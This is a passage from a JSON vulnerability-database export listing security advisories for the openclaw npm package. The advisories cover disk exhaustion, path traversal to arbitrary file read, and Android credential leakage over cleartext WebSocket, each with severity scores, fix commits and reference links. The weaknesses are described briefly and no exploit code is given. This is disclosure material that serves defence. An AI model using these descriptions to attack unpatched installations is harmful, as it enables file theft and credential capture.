(npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `2194587d70d2aef863508b945319c5a7c88b12ce` — 2026-03-31T19:40:15+09:00\n\n## Release Process Note\n- The fix is already present in released version `2026.3.31`.\n- This draft looks ready for final maintainer disposition or publication, not additional code-fix work.\n\nThanks @AntAISecurityLab for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41408", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00051", "scoring_system": "epss", "scoring_elements": "0.16254", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00051", "scoring_system": "epss", "scoring_elements": "0.16298", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00051", "scoring_system": "epss", "scoring_elements": "0.16308", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41408" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/2194587d70d2aef863508b945319c5a7c88b12ce", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" }, { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:35:12Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/2194587d70d2aef863508b945319c5a7c88b12ce" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-4g5x-2jfc-xm98", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" }, { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:35:12Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-4g5x-2jfc-xm98" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41408", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41408" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-disk-exhaustion-via-media-download-bypass", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" }, { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:35:12Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-disk-exhaustion-via-media-download-bypass" }, { "reference_url": "https://github.com/advisories/GHSA-4g5x-2jfc-xm98", "reference_id": "GHSA-4g5x-2jfc-xm98", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-4g5x-2jfc-xm98" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api", "purl": "pkg:npm/openclaw@2026.3.31", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31" } ], "aliases": [ "CVE-2026-41408", "GHSA-4g5x-2jfc-xm98" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-2wr9-h42m-a7ev" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89250?format=api", "vulnerability_id": "VCID-32zs-2zs9-uufs", "summary": "OpenClaw: Media Parsing Path Traversal Leads to Arbitrary File Read\n## Summary\nOpenClaw <= 2026.3.24 Media Parsing Path Traversal to Arbitrary File Read\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.24`\n- Patched versions: `>= 2026.3.28`\n- First stable tag containing the fix: `v2026.3.28`\n\n## Fix Commit(s)\n- `4797bbc5b96e2cca5532e43b58915c051746fe37` — 2026-03-25T13:35:16-06:00\n\n## Release Process Note\n- The fix is already present in released version `2026.3.28`.", "references": [ { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/4797bbc5b96e2cca5532e43b58915c051746fe37", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/4797bbc5b96e2cca5532e43b58915c051746fe37" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-f6pf-4gjx-c94r", "reference_id": "", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-f6pf-4gjx-c94r" }, { "reference_url": "https://github.com/advisories/GHSA-f6pf-4gjx-c94r", "reference_id": "GHSA-f6pf-4gjx-c94r", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-f6pf-4gjx-c94r" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109863?format=api", "purl": "pkg:npm/openclaw@2026.3.28", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-9xrt-mv81-3yc8" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, { "vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, { "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28" } ], "aliases": [ "GHSA-f6pf-4gjx-c94r" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-32zs-2zs9-uufs" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89946?format=api", "vulnerability_id": "VCID-356u-h788-pkgt", "summary": "OpenClaw: Android accepted cleartext remote gateway endpoints and sent stored credentials over ws://\n## Summary\n\nBefore OpenClaw 2026.4.2, Android accepted non-loopback cleartext `ws://` gateway endpoints and would send stored gateway credentials over that connection. Discovery beacons or setup codes could therefore steer the client onto a cleartext remote endpoint.\n\n## Impact\n\nA user who followed a forged discovery result or scanned a crafted setup code could disclose stored gateway credentials to an attacker-controlled endpoint in plaintext. This was a transport-security bug in the Android gateway client.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.4.1`\n- Patched versions: `>= 2026.4.2`\n- Latest published npm version: `2026.4.1`\n\n## Fix Commit(s)\n\n- `a941a4fef9bc43b2973c92d0dcff5b8a426210c5` — require TLS for remote Android gateway endpoints\n\n## Release Process Note\n\nThe fix is present on `main` and is staged for OpenClaw `2026.4.2`. Publish this advisory after the `2026.4.2` npm release is live.\n\nThanks @zsxsoft for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-40045", "reference_id": "", "reference_type": "", "scores": [ { "value": "6e-05", "scoring_system": "epss", "scoring_elements": "0.00423", "published_at": "2026-06-07T12:55:00Z" }, { "value": "6e-05", "scoring_system": "epss", "scoring_elements": "0.00428", "published_at": "2026-06-06T12:55:00Z" }, { "value": "6e-05", "scoring_system": "epss", "scoring_elements": "0.00427", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-40045" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/a941a4fef9bc43b2973c92d0dcff5b8a426210c5", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" }, { "value": "5.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-21T13:37:33Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/a941a4fef9bc43b2973c92d0dcff5b8a426210c5" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-83f3-hh45-vfw9", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "5.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-21T13:37:33Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-83f3-hh45-vfw9" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40045", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40045" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-cleartext-credential-transmission-via-unencrypted-websocket-gateway-endpoints", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" }, { "value": "5.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-21T13:37:33Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-cleartext-credential-transmission-via-unencrypted-websocket-gateway-endpoints" }, { "reference_url": 